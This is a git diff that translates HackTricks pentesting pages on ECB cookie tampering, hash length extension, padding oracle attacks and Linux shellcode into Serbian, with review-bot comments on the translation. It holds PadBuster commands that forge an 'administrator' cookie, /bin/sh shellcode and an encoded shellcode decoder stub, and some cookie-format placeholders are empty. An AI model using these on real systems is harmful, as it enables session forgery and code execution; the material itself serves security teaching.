`` or ``. 
For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:** +| Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+lozinke: | Dužina kolačića (nakon dekodiranja): | +| -------------------------- | ---------------- | --------------------------------- | ------------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | -| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): | -| ---------------- | ---------------- | ------------------------- | --------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +# Iskorišćavanje ranjivosti -# Exploitation of the vulnerability - -## Removing entire blocks - -Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: +## Uklanjanje celih blokova +Znajući format kolačića (`|`), kako bi se predstavio kao korisnik `admin`, kreirajte novog korisnika pod imenom `aaaaaaaaadmin` i dobijte kolačić i dekodirajte ga: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` - -We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\ -Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`: - +Možemo videti obrazac `\x23U\xE45K\xCB\x21\xC8` koji je prethodno kreiran sa korisničkim imenom koje je sadržalo samo `a`.\ +Zatim, možete ukloniti prvi blok od 8B i dobićete važeći kolačić za korisničko ime `admin`: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` +## Premještanje blokova -## Moving blocks +U mnogim bazama podataka je isto pretraživati `WHERE username='admin';` ili `WHERE username='admin ';` _(Obratite pažnju na dodatne 
razmake)_ -In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ +Dakle, drugi način da se impersonira korisnik `admin` bio bi: -So, another way to impersonate the user `admin` would be to: +- Generisati korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B. +- Zatim, generisati lozinku koja će popuniti tačan broj blokova koji sadrže korisničko ime koje želimo da impersoniramo i razmake, kao što je: `admin ` -- Generate a username that: `len() + len(` will generate 2 blocks of 8Bs. -- Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin ` +Kolačić ovog korisnika će se sastojati od 3 bloka: prva 2 su blokovi korisničkog imena + delimiter, a treći je lozinka (koja lažira korisničko ime): `username |admin ` -The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin ` +**Zatim, samo zamenite prvi blok sa poslednjim i bićete impersonirajući korisnika `admin`: `admin |username`** -**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** - -## References +## Reference - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]() diff --git a/src/cryptography/hash-length-extension-attack.md b/src/cryptography/hash-length-extension-attack.md index 837cedd01..9bf823311 100644 --- a/src/cryptography/hash-length-extension-attack.md +++ b/src/cryptography/hash-length-extension-attack.md 
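Review bot: In `electronic-code-book-ecb.md`, `koristeći jedini ključ` says "using the only key"; the original `using the only key` means one and the same key for every block, so `koristeći jedan isti ključ` carries the meaning. `## Premještanje blokova` is ijekavian while the rest of the file is ekavian (`Premeštanje blokova`), and `bićete impersonirajući korisnika` is not Serbian; `lažno ćete se predstaviti kao korisnik admin`. Separately, the cookie-format placeholders are empty on both sides of this hunk: `kolačić aplikacije **\`|\`**`, `format \`\` ili \`\``, and `len() + len(`. Whatever stood between those backticks in the source (the username and password parts the later sentences refer to as `blokovi korisničkog imena + delimiter` and `lozinka`) has been lost, so the translated sentences cannot be followed; please check the source file and restore the placeholders, escaping them if markup stripping is what removed them.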
@@ -1,36 +1,36 @@ {{#include ../banners/hacktricks-training.md}} -# Summary of the attack +# Sažetak napada -Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: +Zamislite server koji **potpisuje** neke **podatke** tako što **dodaje** **tajnu** nekim poznatim čistim tekstualnim podacima i zatim hešira te podatke. Ako znate: -- **The length of the secret** (this can be also bruteforced from a given length range) -- **The clear text data** -- **The algorithm (and it's vulnerable to this attack)** -- **The padding is known** - - Usually a default one is used, so if the other 3 requirements are met, this also is - - The padding vary depending on the length of the secret+data, that's why the length of the secret is needed +- **Dužinu tajne** (to se može takođe bruteforce-ovati iz datog opsega dužine) +- **Čiste tekstualne podatke** +- **Algoritam (i da je ranjiv na ovaj napad)** +- **Padding je poznat** +- Obično se koristi podrazumevani, tako da ako su ispunjena druga 3 zahteva, ovo takođe važi +- Padding varira u zavisnosti od dužine tajne + podataka, zato je potrebna dužina tajne -Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previous data + appended data**. +Tada je moguće da **napadač** **doda** **podatke** i **generiše** važeći **potpis** za **prethodne podatke + dodate podatke**. -## How? +## Kako? -Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**. +U suštini, ranjivi algoritmi generišu heševe tako što prvo **heširaju blok podataka**, a zatim, **iz** **prethodno** kreiranog **heša** (stanja), **dodaju sledeći blok podataka** i **heširaju ga**. 
-Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\ -If an attacker wants to append the string "append" he can: +Zamislite da je tajna "secret" a podaci su "data", MD5 od "secretdata" je 6036708eba0d11f6ef52ad44e8b74d5b.\ +Ako napadač želi da doda string "append" može: -- Generate a MD5 of 64 "A"s -- Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b -- Append the string "append" -- Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** +- Generisati MD5 od 64 "A" +- Promeniti stanje prethodno inicijalizovanog heša na 6036708eba0d11f6ef52ad44e8b74d5b +- Dodati string "append" +- Završiti heš i rezultantni heš će biti **važeći za "secret" + "data" + "padding" + "append"** -## **Tool** +## **Alat** {% embed url="https://github.com/iagox86/hash_extender" %} -## References +## Reference -You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +Ovaj napad je dobro objašnjen na [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} diff --git a/src/cryptography/padding-oracle-priv.md b/src/cryptography/padding-oracle-priv.md index 499b42d4b..f68382449 100644 --- a/src/cryptography/padding-oracle-priv.md +++ b/src/cryptography/padding-oracle-priv.md @@ -2,26 +2,24 @@
-{% embed url="https://websec.nl/" %} - # CBC - Cipher Block Chaining -In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: +U CBC režimu **prethodni enkriptovani blok se koristi kao IV** za XOR sa sledećim blokom: ![https://defuse.ca/images/cbc_encryption.png](https://defuse.ca/images/cbc_encryption.png) -To decrypt CBC the **opposite** **operations** are done: +Da bi se dekriptovao CBC, vrše se **suprotne** **operacije**: ![https://defuse.ca/images/cbc_decryption.png](https://defuse.ca/images/cbc_decryption.png) -Notice how it's needed to use an **encryption** **key** and an **IV**. +Obratite pažnju na to da je potrebno koristiti **ključ za enkripciju** i **IV**. -# Message Padding +# Poravnanje poruka -As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\ -Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`. +Kako se enkripcija vrši u **fiksnim** **veličinama** **blokova**, obično je potrebno **poravnanje** u **poslednjem** **bloku** da bi se završila njegova dužina.\ +Obično se koristi **PKCS7**, koji generiše poravnanje **ponavljajući** **broj** **bajtova** **potrebnih** da se **završi** blok. Na primer, ako poslednjem bloku nedostaje 3 bajta, poravnanje će biti `\x03\x03\x03`. -Let's look at more examples with a **2 blocks of length 8bytes**: +Pogledajmo više primera sa **2 bloka dužine 8 bajtova**: | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | 
@@ -30,51 +28,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**: | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -Note how in the last example the **last block was full so another one was generated only with padding**. +Obratite pažnju na to kako je u poslednjem primeru **poslednji blok bio pun, pa je generisan još jedan samo sa poravnanjem**. # Padding Oracle -When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**. +Kada aplikacija dekriptuje enkriptovane podatke, prvo će dekriptovati podatke; zatim će ukloniti poravnanje. Tokom čišćenja poravnanja, ako **nevažeće poravnanje izazove uočljivo ponašanje**, imate **ranjivost padding oracle**. Uočljivo ponašanje može biti **greška**, **nedostatak rezultata** ili **sporiji odgovor**. -If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. +Ako primetite ovo ponašanje, možete **dekriptovati enkriptovane podatke** i čak **enkriptovati bilo koji čist tekst**. 
-## How to exploit - -You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do +## Kako iskoristiti +Možete koristiti [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) da iskoristite ovu vrstu ranjivosti ili samo uradite ``` sudo apt-get install padbuster ``` - -In order to test if the cookie of a site is vulnerable you could try: - +Da biste testirali da li je kolačić sajta ranjiv, možete pokušati: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` +**Encoding 0** znači da se koristi **base64** (ali su dostupni i drugi, proverite meni pomoći). -**Encoding 0** means that **base64** is used (but others are available, check the help menu). - -You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter: - +Takođe možete **iskoristiti ovu ranjivost da enkriptujete nove podatke. Na primer, zamislite da je sadržaj kolačića "**_**user=MyUsername**_**", tada ga možete promeniti u "\_user=administrator\_" i eskalirati privilegije unutar aplikacije. Takođe to možete uraditi koristeći `paduster`specifikujući -plaintext** parametar: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` - -If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter. 
- +Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u punjenju, ali takođe možete naznačiti poruku o grešci koristeći **-error** parametar. ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` +## Teorija -## The theory - -In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**. +U **sažetku**, možete početi dekriptovati enkriptovane podatke pogađanjem ispravnih vrednosti koje se mogu koristiti za kreiranje svih **različitih paddinga**. Tada će napad padding oracle početi dekriptovanje bajtova od kraja ka početku pogađajući koja će biti ispravna vrednost koja **stvara padding od 1, 2, 3, itd**. ![](<../images/image (629) (1) (1).png>) -Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\ -In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\ -Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So: +Zamislite da imate neki enkriptovani tekst koji zauzima **2 bloka** formirana bajtovima od **E0 do E15**.\ +Da biste **dekriptovali** **poslednji** **blok** (**E8** do **E15**), ceo blok prolazi kroz "dekripciju blok cifre" generišući **intermedijarne bajtove I0 do I15**.\ +Na kraju, svaki intermedijarni bajt se **XOR-uje** sa prethodnim enkriptovanim bajtovima (E0 do E7). Tako: - `C15 = D(E15) ^ E7 = I15 ^ E7` - `C14 = I14 ^ E6` 
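Review bot: `+Takođe to možete uraditi koristeći `paduster`specifikujući -plaintext** parametar:` in the `@@ -30,51 +28,43 @@` hunk of `padding-oracle-priv.md` carries over both the `paduster` typo and the missing space from the English line; the tool is `padbuster` (see the `sudo apt-get install padbuster` fence just above), so write `koristeći `padbuster` specifikujući `-plaintext` parametar`. The same hunk introduces a third word for padding: `greška u punjenju` (`+Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u punjenju`) and `različitih paddinga` in the `## Teorija` paragraph, while the previous hunk of this file translated the concept as `poravnanje`; settle on one term across the page (the `# Padding Oracle` heading suggests keeping `padding`). Finally, the blank lines on either side of the ``` fences are removed here without a translation reason; keeping them would limit the diff to actual text changes.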
@@ -82,33 +72,31 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes ( - `C12 = I12 ^ E4` - ... -Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7` +Sada, moguće je **modifikovati `E7` dok `C15` ne bude `0x01`**, što će takođe biti ispravan padding. Tako, u ovom slučaju: `\x01 = I15 ^ E'7` -So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7` +Dakle, pronalaženjem E'7, moguće je **izračunati I15**: `I15 = 0x01 ^ E'7` -Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` +Što nam omogućava da **izračunamo C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`. +Znajući **C15**, sada je moguće **izračunati C14**, ali ovaj put brute-forcing padding `\x02\x02`. -This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\ -Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** +Ovaj BF je jednako složen kao prethodni jer je moguće izračunati `E''15` čija je vrednost 0x02: `E''7 = \x02 ^ I15` tako da je samo potrebno pronaći **`E'14`** koji generiše **`C14` jednako `0x02`**.\ +Zatim, uradite iste korake da dekriptujete C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**Follow this chain until you decrypt the whole encrypted text.** +**Pratite chain dok ne dekriptujete ceo enkriptovani tekst.** -## Detection of the vulnerability +## Detekcija ranjivosti -Register and account and log in with this account .\ -If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. 
If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t. +Registrujte se i prijavite sa ovim nalogom.\ +Ako se **prijavljujete više puta** i uvek dobijate **isti cookie**, verovatno postoji **nešto** **pogrešno** u aplikaciji. **Cookie koji se vraća treba da bude jedinstven** svaki put kada se prijavite. Ako je cookie **uvek** **isti**, verovatno će uvek biti važeći i neće biti načina da se **poništi**. -Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ -But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. +Sada, ako pokušate da **modifikujete** **cookie**, možete videti da dobijate **grešku** iz aplikacije.\ +Ali ako BF-ujete padding (koristeći padbuster na primer) uspete da dobijete drugi cookie važeći za drugog korisnika. Ovaj scenario je veoma verovatno ranjiv na padbuster. -## References +## Reference - [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)
-{% embed url="https://websec.nl/" %} - {{#include ../banners/hacktricks-training.md}} diff --git a/src/cryptography/rc4-encrypt-and-decrypt.md b/src/cryptography/rc4-encrypt-and-decrypt.md index dc89fa296..0e0a77711 100644 --- a/src/cryptography/rc4-encrypt-and-decrypt.md +++ b/src/cryptography/rc4-encrypt-and-decrypt.md @@ -1,8 +1,8 @@ {{#include ../banners/hacktricks-training.md}} -If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. +Ako možete na neki način enkriptovati običan tekst koristeći RC4, možete dekriptovati bilo koji sadržaj enkriptovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju enkripcije. -If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: +Ako možete enkriptovati poznati običan tekst, takođe možete izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} diff --git a/src/emails-vulns.md b/src/emails-vulns.md index 15d9cc343..5fb8d5a33 100644 --- a/src/emails-vulns.md +++ b/src/emails-vulns.md @@ -1,4 +1,4 @@ -# Emails Vulnerabilities +# Ranljivosti E-mailova {{#include ./banners/hacktricks-training.md}} @@ -7,4 +7,3 @@ ## {{#include ./banners/hacktricks-training.md}} - diff --git a/src/exploiting/linux-exploiting-basic-esp/README.md b/src/exploiting/linux-exploiting-basic-esp/README.md index b0feaf1a9..6cc5aae2d 100644 --- a/src/exploiting/linux-exploiting-basic-esp/README.md +++ b/src/exploiting/linux-exploiting-basic-esp/README.md 
@@ -4,39 +4,36 @@ ## **2.SHELLCODE** -Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “\_\_NR\_” +Ver interrupcije kernela: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “\_\_NR\_” setreuid(0,0); // \_\_NR_setreuid 70\ execve(“/bin/sh”, args\[], NULL); // \_\_NR_execve 11\ exit(0); // \_\_NR_exit 1 -xor eax, eax ; limpiamos eax\ -xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\ +xor eax, eax ; čistimo eax\ +xor ebx, ebx ; ebx = 0 jer nema argumenta koji treba proslediti\ mov al, 0x01 ; eax = 1 —> \_\_NR_exit 1\ -int 0x80 ; Ejecutar syscall +int 0x80 ; Izvrši syscall -**nasm -f elf assembly.asm** —> Nos devuelve un .o\ -**ld assembly.o -o shellcodeout** —> Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump**\ -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes - -**Comprobar que la shellcode funciona** +**nasm -f elf assembly.asm** —> Vraća nam .o\ +**ld assembly.o -o shellcodeout** —> Daje nam izvršni fajl sastavljen od asembler koda i možemo izvući opkode sa **objdump**\ +**objdump -d -Mintel ./shellcodeout** —> Da vidimo da je to zaista naš shellcode i izvučemo OpCode +**Proveriti da shellcode funkcioniše** ``` char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80” void main(){ - void (*fp) (void); - fp = (void *)shellcode; - fp(); +void (*fp) (void); +fp = (void *)shellcode; +fp(); } ``` +Da biste videli da se sistemski pozivi pravilno izvršavaju, potrebno je da kompajlirate prethodni program i sistemski pozivi treba da se pojave u **strace ./PROGRAMA_COMPILADO**. -Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA_COMPILADO** - -A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. 
Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código. - -EJ **TRUCO (/bin/sh)**: +Kada se kreiraju shellcode-ovi, može se primeniti trik. Prva instrukcija je jump na call. Call poziva originalni kod i takođe stavlja EIP na stek. Nakon instrukcije call, stavili smo string koji nam je potreban, tako da sa tim EIP-om možemo ukazati na string i nastaviti sa izvršavanjem koda. +EJ **TRIK (/bin/sh)**: ``` jmp 0x1f ; Salto al último call popl %esi ; Guardamos en ese la dirección al string @@ -56,9 +53,7 @@ int $0x80 ; exit(0) call -0x24 ; Salto a la primera instrución .string \”/bin/sh\” ; String a usar ``` - -**EJ usando el Stack(/bin/sh):** - +**EJ koristeći Stack(/bin/sh):** ``` section .text global _start 
@@ -79,54 +74,49 @@ mov ecx, esp ; arg2 = args[] mov al, 0x0b ; Syscall 11 int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL) ``` - **EJ FNSTENV:** - ``` fabs fnstenv [esp-0x0c] pop eax ; Guarda el EIP en el que se ejecutó fabs … ``` - **Egg Huter:** -Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada (busca alguna firma puesta en la shellcode). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código. +Sastoji se od malog koda koji pretražuje stranice memorije povezane sa procesom u potrazi za shellcode-om koji je tamo sačuvan (traži neku potpisanu shellcode). Korisno u slučajevima kada se ima samo mali prostor za injektovanje koda. -**Shellcodes polimórficos** - -Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**: +**Shellcodes polimorfni** +Sastoje se od šifrovanih shell-ova koji imaju mali kod koji ih dešifruje i preskoči na njega, koristeći trik Call-Pop, ovo bi bio **primer šifrovanja cezara**: ``` global _start _start: - jmp short magic +jmp short magic init: - pop esi - xor ecx, ecx - mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) +pop esi +xor ecx, ecx +mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) desc: - sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) - sub cl, 1 - jnz desc - jmp short sc +sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) +sub cl, 1 +jnz desc +jmp short sc magic: - call init +call init sc: - ;Aquí va el shellcode +;Aquí va el shellcode ``` +## **5.Dopunske metode** -## **5.Métodos complementarios** +**Murat tehnika** -**Técnica de Murat** +U linuxu se svi programi mapiraju počinjući od 0xbfffffff -En linux todos los progamas se mapean 
comenzando en 0xbfffffff +Gledajući kako se gradi stek novog procesa u linuxu, može se razviti exploit tako da se program pokrene u okruženju čija je jedina promenljiva shellcode. Adresa ove se može izračunati kao: addr = 0xbfffffff - 4 - strlen(PUNO_izvršnog_imena) - strlen(shellcode) -Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE_ejecutable_completo) - strlen(shellcode) +Na ovaj način se jednostavno dobija adresa gde se nalazi promenljiva okruženja sa shellcode. -De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode. - -Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen +To se može uraditi zahvaljujući funkciji execle koja omogućava kreiranje okruženja koje ima samo željene promenljive okruženja. ## 
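Review bot: `+Sastoji se od malog koda ... (traži neku potpisanu shellcode)` in the `@@ -79,54 +74,49 @@` hunk of `linux-exploiting-basic-esp/README.md` mistranslates `busca alguna firma puesta en la shellcode`: the egg hunter scans memory for a signature (marker bytes) placed in front of the shellcode, not for a "signed" shellcode; suggest `(traži potpis ubačen u shellcode)`. `+**Shellcodes polimorfni**` would read naturally as `**Polimorfni shellcode-ovi**`. The Caesar-decoder asm block is changed only by stripping indentation (`-  jmp short magic` → `+jmp short magic`, `-  pop esi` → `+pop esi`, and so on) while its comments stay Spanish (`; Hay que sustituir el 0 por la longitud del shellcode`, `;Aquí va el shellcode`); either translate the comments in the same pass or leave the block untouched, since whitespace-only edits inside fences add noise to a translation diff. The context line `**Egg Huter:**` also carries a typo (`Egg Hunter`) that this pass could fix while it is rewriting the paragraph below it.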
@@ -140,124 +130,124 @@ Esto se puede hacer gracias a que la función execle permite crear un entorno qu ### **Format Strings to Buffer Overflows** -Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ -For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. +**sprintf moves** formatirani string **u** **promenljivu.** Stoga, možete zloupotrebiti **formatiranje** stringa da izazovete **buffer overflow u promenljivoj** u koju se sadržaj kopira.\ +Na primer, payload `%.44xAAAA` će **napisati 44B+"AAAA" u promenljivu**, što može izazvati buffer overflow. -### **\_\_atexit Structures** +### **\_\_atexit strukture** > [!CAUTION] -> Nowadays is very **weird to exploit this**. +> Danas je veoma **čudno iskoristiti ovo**. -**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\ -If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\ -Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64_86**.\ -The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. 
+**`atexit()`** je funkcija kojoj se **druge funkcije prosleđuju kao parametri.** Ove **funkcije** će biti **izvršene** prilikom izvršavanja **`exit()`** ili **povratka** iz **main**.\ +Ako možete **modifikovati** **adresu** bilo koje od ovih **funkcija** da pokazuje na shellcode, na primer, dobićete **kontrolu** nad **procesom**, ali to je trenutno komplikovanije.\ +Trenutno su **adrese funkcija** koje treba izvršiti **sakrivene** iza nekoliko struktura i konačno adresa na koju pokazuje nije adresa funkcija, već je **kriptovana XOR** i pomeranjima sa **nasumičnim ključem**. Tako da je trenutno ovaj vektorski napad **ne baš koristan, barem na x86** i **x64_86**.\ +**Funkcija za enkripciju** je **`PTR_MANGLE`**. **Druge arhitekture** kao što su m68k, mips32, mips64, aarch64, arm, hppa... **ne implementiraju funkciju enkripcije** jer **vraća isto** što je primila kao ulaz. Tako da bi ove arhitekture bile podložne ovom vektoru napada. ### **setjmp() & longjmp()** > [!CAUTION] -> Nowadays is very **weird to exploit this**. +> Danas je veoma **čudno iskoristiti ovo**. -**`Setjmp()`** allows to **save** the **context** (the registers)\ -**`longjmp()`** allows to **restore** the **context**.\ -The **saved registers** are: `EBX, ESI, EDI, ESP, EIP, EBP`\ -What happens is that EIP and ESP are passed by the **`PTR_MANGLE`** function, so the **architecture vulnerable to this attack are the same as above**.\ -They are useful for error recovery or interrupts.\ -However, from what I have read, the other registers are not protected, **so if there is a `call ebx`, `call esi` or `call edi`** inside the function being called, control can be taken over. Or you could also modify EBP to modify the ESP. 
+**`Setjmp()`** omogućava **čuvanje** **konteksta** (registara)\ +**`longjmp()`** omogućava **obnavljanje** **konteksta**.\ +**Sačuvani registri** su: `EBX, ESI, EDI, ESP, EIP, EBP`\ +Šta se dešava je da su EIP i ESP prosleđeni funkciji **`PTR_MANGLE`**, tako da su **arhitekture podložne ovom napadu iste kao gore**.\ +Koriste se za oporavak od grešaka ili prekida.\ +Međutim, prema onome što sam pročitao, ostali registri nisu zaštićeni, **tako da ako postoji `call ebx`, `call esi` ili `call edi`** unutar pozvane funkcije, kontrola može biti preuzeta. Ili možete takođe modifikovati EBP da modifikujete ESP. -**VTable y VPTR en C++** +**VTable i VPTR u C++** -Each class has a **Vtable** which is an array of **pointers to methods**. +Svaka klasa ima **Vtable** koja je niz **pokazivača na metode**. -Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode. +Svaki objekat klase ima **VPtr** koji je **pokazivač** na niz svoje klase. VPtr je deo zaglavlja svakog objekta, tako da ako se postigne **prepisivanje** **VPtr** može se **modifikovati** da **pokazuje** na lažnu metodu tako da izvršavanje funkcije ide na shellcode. -## **Medidas preventivas y evasiones** +## **Preventivne mere i izbegavanja** ### -**Reemplazo de Libsafe** +**Zamena Libsafe** -Se activa con: LD_PRELOAD=/lib/libsafe.so.2\ -o\ +Aktivira se sa: LD_PRELOAD=/lib/libsafe.so.2\ +ili\ “/lib/libsave.so.2” > /etc/ld.so.preload -Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD_PRELOAD no sirve en binarios con suid). 
